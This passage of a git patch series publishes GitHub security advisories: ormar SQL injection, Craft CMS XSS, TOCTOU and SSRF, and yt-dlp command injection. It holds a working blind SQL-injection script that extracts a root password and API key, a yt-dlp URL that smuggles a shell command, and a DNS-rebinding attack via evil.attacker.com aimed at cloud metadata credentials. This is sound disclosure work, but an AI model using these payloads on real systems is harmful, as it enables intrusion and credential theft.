f\"LENGTH((SELECT password FROM {target_table} WHERE username='root'))\"\n pw_len = int(inject(payload))\n extracted = \"\"\n request_count = 0\n for pos in range(1, pw_len + 1):\n low, high = 32, 126\n while low <= high:\n mid = (low + high) // 2\n payload = (\n f\"CASE WHEN UNICODE(SUBSTR(\"\n f\"(SELECT password FROM {target_table} \"\n f\"WHERE username='root'),{pos},1))>{mid} \"\n f\"THEN 1 ELSE 0 END\"\n )\n result = inject(payload)\n request_count += 1\n if result == 1:\n low = mid + 1\n else:\n high = mid - 1\n extracted += chr(low)\n sys.stdout.write(f\"\\\\r[Stage 5] Extracting: {extracted}\")\n sys.stdout.flush()\n print(f\"\\\\n[Stage 5] Password extracted: {extracted} ({request_count} requests)\")\n\n # ── Stage 6: Steal API key ────────────────────────────────\n payload = f\"(SELECT api_key FROM {target_table} WHERE username='root')\"\n result = inject(payload)\n print(f\"[Stage 6] Production API key: {result}\")\n\n print(f\"\\\\nTotal HTTP requests: {request_count + 6}\")\n print(\"All data extracted through a single public API endpoint.\")\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Vulnerability Impact\n\nThis attack allows an unauthenticated user to read the entire database contents. Any API endpoint that passes user-controlled input to `Model.objects.min()` or `Model.objects.max()` becomes a full SQL injection entry point.\n\nThe attack is confirmed to work with the following database backends:\n\n- SQLite (via aiosqlite)\n- PostgreSQL (via asyncpg) — subquery syntax is identical\n- MySQL (via aiomysql) — subquery syntax is compatible\n\n**Realistic attack scenarios include:**\n\n- **REST APIs** with user-selectable aggregate fields: `GET /items/stats?column=`\n- **GraphQL resolvers** that accept field names as arguments\n- **Dynamic report generators** where users select columns for aggregation\n\nThe vulnerable server in this PoC is based on the **official ormar FastAPI example**, demonstrating that the vulnerability is easily triggered through natural, documented API design patterns. The ormar documentation itself shows this exact usage pattern: `await Book.objects.max(columns=[\"year\"])` ([[ormar aggregations docs](https://collerek.github.io/ormar/queries/aggregations/)](https://collerek.github.io/ormar/queries/aggregations/)).\n\n## Display of attack results\nTerminal 1 — Start server:\n![image](https://github.com/user-attachments/assets/4c8b4a20-75da-4aba-b649-f818e46165dd)\nTerminal 2 — Run attacker:\n\"image\n\"image", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ormar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.9.9" + }, + { + "fixed": "0.23.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.22.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/collerek/ormar/security/advisories/GHSA-xxh2-68g9-8jqr" + }, + { + "type": "WEB", + "url": "https://github.com/collerek/ormar/commit/a03bae14fe01358d3eaf7e319fcd5db2e4956b16" + }, + { + "type": "PACKAGE", + "url": "https://github.com/collerek/ormar" + }, + { + "type": "WEB", + "url": "https://github.com/collerek/ormar/releases/tag/0.23.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:12:17Z", + "nvd_published_at": null + } +} \ No newline at end of file From 4088f0ca6fc0fda9baa4da98def1c0f8117c267b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:15:35 +0000 Subject: [PATCH 60/77] Publish Advisories GHSA-3jh3-prx3-w6wc GHSA-g3gw-q23r-pgqm --- .../GHSA-3jh3-prx3-w6wc.json | 86 +++++++++++++++++++ .../GHSA-g3gw-q23r-pgqm.json | 65 ++++++++++++++ 2 files changed, 151 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..ae3676244f566 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json @@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-23T22:15:03Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json b/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json new file mode 100644 index 0000000000000..7306b450b6433 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g3gw-q23r-pgqm/GHSA-g3gw-q23r-pgqm.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3gw-q23r-pgqm", + "modified": "2026-02-23T22:13:58Z", + "published": "2026-02-23T22:13:58Z", + "aliases": [ + "CVE-2026-26331" + ], + "summary": "yt-dlp: Arbitrary Command Injection when using the `--netrc-cmd` option", + "details": "### Summary\nWhen yt-dlp's `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter) is used, an attacker could achieve arbitrary command injection on the user's system with a maliciously crafted URL.\n\n### Impact\nyt-dlp maintainers assume the impact of this vulnerability to be high for anyone who uses `--netrc-cmd` in their command/configuration or `netrc_cmd` in their Python scripts. Even though the maliciously crafted URL itself will look very suspicious to many users, it would be trivial for a maliciously crafted webpage with an inconspicuous URL to covertly exploit this vulnerability via HTTP redirect. Users without `--netrc-cmd` in their arguments or `netrc_cmd` in their scripts are unaffected. No evidence has been found of this exploit being used in the wild.\n\n### Patches\nyt-dlp version 2026.02.21 fixes this issue by validating all netrc \"machine\" values and raising an error upon unexpected input.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2026.02.21 as soon as possible.\n\nUsers who are unable to upgrade should avoid using the `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter), or they should at least not pass a placeholder (`{}`) in their `--netrc-cmd` argument.\n\n### Details\nyt-dlp's `--netrc-cmd` option can be used to run any arbitrary shell command to retrieve site login credentials so that the user doesn't have to store the credentials as plaintext in the filesystem. The `--netrc-cmd` argument is a shell command with an optional placeholder (`{}`). If the placeholder is present in the argument, it is replaced with the netrc \"machine\" value, which specifies the site for which login credentials are needed.\n\nThe netrc \"machine\" value is usually explicitly defined in yt-dlp's extractor code for a given site. However, yt-dlp has four extractors where the netrc \"machine\" value needs to be dynamically sourced from the site's hostname. And in three of those extractors (`GetCourseRuIE`, `TeachableIE` and `TeachableCourseIE`), wildcard matches are allowed for one or more subdomains of the hostname. This can result in a netrc \"machine\" value that contains special shell characters.\n\nThe `--netrc-cmd` argument is executed by a modified version of Python's `subprocess.Popen` with `shell=True`, which means that any special characters may be interpreted by the host shell, potentially leading to arbitrary command injection.\n\nHere is an example of maliciously crafted URL input that exploits the vulnerability:\n\n```cmd\n> yt-dlp --netrc-cmd \"echo {}\" \"https://;echo pwned>&2;#.getcourse.ru/video\"\n[GetCourseRu] Executing command: echo getcourseru\nWARNING: [GetCourseRu] Failed to parse .netrc: bad toplevel token 'getcourseru' (-, line 2)\n[GetCourseRu] Extracting URL: https://;echo pwned>&2;#.getcourse.ru/video\n[GetCourseRu] Executing command: echo ;echo pwned>&2;\npwned\n[GetCourseRu] No authenticators for ;echo pwned>&2;\n[GetCourseRu] video: Downloading webpage\n```\n\nAlthough only 3 of yt-dlp's extractors are directly susceptible to this attack, yt-dlp's \"generic\" extractor will follow HTTP redirects and try to match the resulting URL with one of the dedicated extractors. This means that any URL processed by the generic extractor could ultimately lead to a maliciously crafted URL that is matched by one of the vulnerable extractors. Hypothetically, an attacker could create a website with an inconspicuous URL and legitimate-looking media content that would serve an HTTP redirect to a maliciously crafted URL when it detects a request from yt-dlp.\n\n\n### References\n- https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-g3gw-q23r-pgqm\n- https://nvd.nist.gov/vuln/detail/CVE-2026-26331\n- https://github.com/yt-dlp/yt-dlp/releases/tag/2026.02.21\n- https://github.com/yt-dlp/yt-dlp/commit/1fbbe29b99dc61375bf6d786f824d9fcf6ea9c1a", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "yt-dlp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2023.06.21" + }, + { + "fixed": "2026.02.21" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-g3gw-q23r-pgqm" + }, + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/commit/1fbbe29b99dc61375bf6d786f824d9fcf6ea9c1a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yt-dlp/yt-dlp" + }, + { + "type": "WEB", + "url": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.02.21" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:13:58Z", + "nvd_published_at": null + } +} \ No newline at end of file From 819404a40c9244d0f19f0c1e06a8dd8ac78610a8 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:17:21 +0000 Subject: [PATCH 61/77] Publish Advisories GHSA-6fx5-5cw5-4897 GHSA-gp2f-7wcm-5fhx --- .../GHSA-6fx5-5cw5-4897.json | 86 ++++++++++++++ .../GHSA-gp2f-7wcm-5fhx.json | 110 ++++++++++++++++++ 2 files changed, 196 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json diff --git a/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json b/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json new file mode 100644 index 0000000000000..b4e1b92bc4543 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-6fx5-5cw5-4897/GHSA-6fx5-5cw5-4897.json @@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fx5-5cw5-4897", + "modified": "2026-02-23T22:16:22Z", + "published": "2026-02-23T22:16:22Z", + "aliases": [ + "CVE-2026-27128" + ], + "summary": "Craft CMS Race condition in Token Service potentially allows for token usage greater than the token limit", + "details": "A Time-of-Check-Time-of-Use (TOCTOU) race condition exists in Craft CMS’s token validation service for tokens that explicitly set a limited usage. The `getTokenRoute()` method reads a token’s usage count, checks if it’s within limits, then updates the database in separate non-atomic operations. By sending concurrent requests, an attacker can use a single-use impersonation token multiple times before the database update completes.\n\nTo make this work, an attacker needs to obtain a valid user account impersonation URL with a non-expired token via some other means and exploit a race condition while bypassing any rate-limiting rules in place.\n\nFor this to be a privilege escalation, the impersonation URL must include a token for a user account with more permissions than the current user.\n\n## References\n\nhttps://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:16:22Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json b/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json new file mode 100644 index 0000000000000..9dd0ec22ecabd --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gp2f-7wcm-5fhx/GHSA-gp2f-7wcm-5fhx.json @@ -0,0 +1,110 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp2f-7wcm-5fhx", + "modified": "2026-02-23T22:16:01Z", + "published": "2026-02-23T22:16:01Z", + "aliases": [ + "CVE-2026-27127" + ], + "summary": "Craft CMS has Cloud Metadata SSRF Protection Bypass via DNS Rebinding", + "details": "## Summary\n\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation performs DNS resolution **separately** from the HTTP request. This Time-of-Check-Time-of-Use (TOCTOU) vulnerability enables DNS rebinding attacks, where an attacker’s DNS server returns different IP addresses for validation compared to the actual request.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)) that allows access to all blocked IPs, not just IPv6 endpoints.\n\n## Severity\n\nBypass of cloud metadata SSRF protection for all blocked IPs\n\n## Required Permissions\n\nExploitation requires GraphQL schema permissions for:\n- Edit assets in the `` volume\n- Create assets in the `` volume\n\nThese permissions may be granted to:\n- Authenticated users with appropriate GraphQL schema access\n- Public Schema (if misconfigured with write permissions)\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\nThe code at `src/gql/resolvers/mutations/Asset.php` performs two separate DNS lookups:\n\n```php\n// VALIDATION PHASE: First DNS resolution at time T1\nprivate function validateHostname(string $url): bool\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n $ip = gethostbyname($hostname); // DNS Lookup #1 - Returns safe IP\n\n if (in_array($ip, [\n '169.254.169.254', // AWS, GCP, Azure IMDS\n '169.254.170.2', // AWS ECS metadata\n '100.100.100.200', // Alibaba Cloud\n '192.0.0.192', // Oracle Cloud\n ])) {\n return false; // Check passes - IP looks safe\n }\n return true;\n}\n\n// ... time gap between validation and request ...\n\n// REQUEST PHASE: Second DNS resolution at time T2 (inside Guzzle)\n$response = $client->get($url); // DNS Lookup #2 - Guzzle resolves DNS AGAIN\n // Now returns 169.254.169.254!\n```\n\n### Root Cause\n\nTwo separate DNS lookups occur:\n1. **Validation**: `gethostbyname()` in `validateHostname()`\n2. **Request**: Guzzle's internal DNS resolution via libcurl\n\nAn attacker controlling a DNS server can return different IPs for each query.\n\n### Bypass Mechanism\n\n```\n+-----------------------------------------------------------------------------+\n| Attacker's DNS Server: evil.attacker.com |\n+-----------------------------------------------------------------------------+\n| Query 1 (Validation - T1): |\n| Request: A record for evil.attacker.com |\n| Response: 1.2.3.4 (safe IP, TTL: 0) |\n| Result: Validation PASSES |\n+-----------------------------------------------------------------------------+\n| Query 2 (Guzzle Request - T2): |\n| Request: A record for evil.attacker.com |\n| Response: 169.254.169.254 (metadata IP, TTL: 0) |\n| Result: Request goes to blocked IP -> CREDENTIALS STOLEN |\n+-----------------------------------------------------------------------------+\n```\n\n---\n\n## Target Endpoints via DNS Rebinding\n\nDNS rebinding allows access to all blocked IPs:\n\n| Target | Rebind To | Impact |\n|--------|-----------|--------|\n| **AWS IMDS** | `169.254.169.254` | IAM credentials, instance identity |\n| **AWS ECS** | `169.254.170.2` | Container credentials |\n| **GCP Metadata** | `169.254.169.254` | Service account tokens |\n| **Azure Metadata** | `169.254.169.254` | Managed identity tokens |\n| **Alibaba Cloud** | `100.100.100.200` | Instance credentials |\n| **Oracle Cloud** | `192.0.0.192` | Instance metadata |\n| **Internal Services** | `127.0.0.1`, `10.x.x.x` | Internal APIs, databases |\n\n---\n\n### Attack Scenario\n\n1. Attacker sets up DNS server with alternating responses\n2. Attacker sends mutation with `url: \"http://evil.attacker.com/latest/meta-data/\"`\n3. First DNS query returns safe IP (e.g., `1.2.3.4`) → validation passes\n4. Second DNS query returns metadata IP (`169.254.169.254`) → request to metadata\n5. Attacker retrieves credentials from ANY cloud provider\n6. **Attacker can now achieve code execution by creating new instances with their SSH key**\n\n---\n\n## Remediation\n\n### Fix: DNS Pinning with CURLOPT_RESOLVE\n\nPin the DNS resolution - use the same resolved IP for both validation and request:\n\n```php\nprivate function validateHostname(string $url): bool\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n\n // Resolve once\n $ip = gethostbyname($hostname);\n\n // Validate the resolved IP\n if (in_array($ip, [\n '169.254.169.254', '169.254.170.2',\n '100.100.100.200', '192.0.0.192',\n ])) {\n return false;\n }\n\n // Store for later use\n $this->pinnedDNS[$hostname] = $ip;\n\n return true;\n}\n\n// When making the request - CRITICAL: Use pinned IP\nprotected function makeRequest(string $url): ResponseInterface\n{\n $hostname = parse_url($url, PHP_URL_HOST);\n $ip = $this->pinnedDNS[$hostname] ?? null;\n\n $options = [];\n if ($ip) {\n // Force Guzzle/curl to use the SAME IP we validated\n $options['curl'] = [\n CURLOPT_RESOLVE => [\n \"$hostname:80:$ip\",\n \"$hostname:443:$ip\"\n ]\n ];\n }\n\n return $this->client->get($url, $options);\n}\n```\n\n### Alternative: Single Resolution with Immediate Use\n\n```php\n// Resolve to IP and use IP directly in URL\n$ip = gethostbyname($hostname);\n\nif (in_array($ip, $blockedIPs)) {\n return false;\n}\n\n// Make request directly to IP with Host header\n$client->get(\"http://$ip\" . parse_url($url, PHP_URL_PATH), [\n 'headers' => [\n 'Host' => $hostname\n ]\n]);\n```\n\n### Additional Mitigations\n\n| Mitigation | Description |\n|------------|-------------|\n| DNS Pinning (CURLOPT_RESOLVE) | Force same IP for validation and request |\n| Single IP-based request | Use resolved IP directly in URL |\n| Implement IMDSv2 | Requires token header (infrastructure-level) |\n| Network egress filtering | Block metadata IPs at network level |\n\n---\n\n## Resources\n\n- https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575\n- [GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc) - Original SSRF vulnerability (CVE-2025-68437)\n- [DNSrebinder](https://github.com/mogwailabs/DNSrebinder) - Lightweight Python DNS server for testing DNS rebinding vulnerabilities; responds with legitimate IP for first N queries, then rebinds to target IP\n- [Singularity DNS Rebinding Tool](https://github.com/nccgroup/singularity)\n- [rbndr DNS Rebinding Service](https://github.com/taviso/rbndr)\n- [DNS Rebinding Attacks Explained](https://unit42.paloaltonetworks.com/dns-rebinding/)\n- [CURLOPT_RESOLVE Documentation](https://curl.se/libcurl/c/CURLOPT_RESOLVE.html)\n- OWASP SSRF Prevention Cheat Sheet", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.5.0" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575" + }, + { + "type": "WEB", + "url": "https://curl.se/libcurl/c/CURLOPT_RESOLVE.html" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + }, + { + "type": "WEB", + "url": "https://github.com/mogwailabs/DNSrebinder" + }, + { + "type": "WEB", + "url": "https://github.com/nccgroup/singularity" + }, + { + "type": "WEB", + "url": "https://github.com/taviso/rbndr" + }, + { + "type": "WEB", + "url": "https://unit42.paloaltonetworks.com/dns-rebinding" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:16:01Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2f2f37a8ccfbd556d3e24e7e3fa4095cacddc6cc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:21:12 +0000 Subject: [PATCH 62/77] Publish Advisories GHSA-5g94-c2wx-8pxw GHSA-5mx2-w598-339m GHSA-6p9p-q6wh-9j89 GHSA-996q-pr4m-cvgq --- .../2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json | 1 + .../2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json | 8 ++++++-- .../2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json | 3 ++- .../2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json | 8 ++++++-- 4 files changed, 15 insertions(+), 5 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json index 40168473dad55..78729e2a9fa3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json +++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json index 9c649f9e47e07..fc0753303755a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json +++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mx2-w598-339m", - "modified": "2026-02-18T22:40:09Z", + "modified": "2026-02-23T22:20:29Z", "published": "2026-02-18T22:40:09Z", "aliases": [ "CVE-2026-27022" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022" + }, { "type": "WEB", "url": "https://github.com/langchain-ai/langgraphjs/pull/1943" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:40:09Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json b/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json index 8170c5c8c686f..65045e70e0566 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json +++ b/advisories/github-reviewed/2026/02/GHSA-6p9p-q6wh-9j89/GHSA-6p9p-q6wh-9j89.json @@ -55,7 +55,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json b/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json index a5ccbd0a0f67b..d0bdaf897cd8b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json +++ b/advisories/github-reviewed/2026/02/GHSA-996q-pr4m-cvgq/GHSA-996q-pr4m-cvgq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-996q-pr4m-cvgq", - "modified": "2026-02-18T22:40:49Z", + "modified": "2026-02-23T22:20:39Z", "published": "2026-02-18T22:40:49Z", "aliases": [ "CVE-2026-27024" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-996q-pr4m-cvgq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27024" + }, { "type": "WEB", "url": "https://github.com/py-pdf/pypdf/pull/3645" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:40:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:28Z" } } \ No newline at end of file From 895a0c32f0f40d28b6e75aca294db326c78a9ec6 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:23:13 +0000 Subject: [PATCH 63/77] Publish Advisories GHSA-4hfh-fch3-5q7p GHSA-5vvm-67pj-72g4 GHSA-7g9x-cp9g-92mr GHSA-9mvc-8737-8j8h GHSA-9pq4-5hcf-288c GHSA-h7h7-mm68-gmrc GHSA-wgvp-vg3v-2xq3 --- .../2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json | 8 ++++++-- 